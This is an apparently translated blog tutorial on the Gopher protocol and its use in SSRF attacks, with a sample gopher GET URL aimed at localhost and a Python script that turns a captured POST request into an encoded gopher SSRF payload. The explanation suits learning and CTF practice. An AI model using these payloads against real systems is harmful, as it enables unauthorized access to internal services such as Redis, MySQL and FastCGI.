[Network Security] Gopher Protocol Principles, Syntax and Utilization Summary

What is the gopher protocol

The Gopher protocol is an early Internet protocol for obtaining text information on the network. It was proposed in 1991 to provide a simple and efficient way to browse and access files.

The Gopher protocol organizes data using a file system-like hierarchy, where each item has a unique identifier. Through the Gopher client software, users can browse the catalog and choose to download or view files. Gopher servers can serve text files, image files, binary files, etc.

The Gopher protocol has a simpler design and fewer features than HTTP. It communicates based on the Transmission Control Protocol (TCP), and the default port number is 70. However, with the rise of the World Wide Web and the popularity of HTTP, the Gopher protocol was gradually replaced.

use

The gopher protocol can be used to attack Redis, Mysql, FastCGI, Ftp, etc. on the intranet, and can also send GET and POST requests, which can broaden the attack surface of SSRF.

grammar

The format of the gopher protocol is usually:

gopher://hostname:port/请求方法(get、post等)/path

Among them, hostname represents the host name or IP address of the Gopher server, port represents the port number that the Gopher server monitors (70 by default), and path is the path of the resource.

for example

To request the /example/file.txt text file on the Gopher server, the following URL format can be used:

gopher://example.com:端口/example/file.txt

Use the GET method of the Gopher protocol to access a resource on port 80 of the local host:

gopher://127.0.0.1:80/_GET /index.php HTTP/1.1

/_GET /index.php HTTP/1.1 means to use the GET method to request resources located at /index.php, and use the HTTP 1.1 protocol version

For POST requests, you can use the following script to convert the data packet into gopher protocol format after capturing the packet:

import urllib.parse

payload = """
POST /被渗透页面.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key/cookie等等=xxx 
#用于身份验证或授权

"""

# 对payload中的特殊字符进行编码
tmp = urllib.parse.quote(payload)

# 将换行符%0A替换为回车换行符%0D%0A，以利用CRLF漏洞
new = tmp.replace('%0A','%0D%0A')

# 构建Gopher URL
result = 'gopher://127.0.0.1:80/'+'_'+new

# 对新增的部分继续编码
result = urllib.parse.quote(result)

print(result)

combat

Practical reference:

[CTF/Network Security] Very_easy_sql problem solving in the offensive and defensive world (gopher protocol + ssrf vulnerability sql injection + blind script)

Summarize

The above is a summary of the principle, syntax and utilization of the [Network Security] gopher protocol, readers can practice it by themselves.

I am Qiu said , see you next time.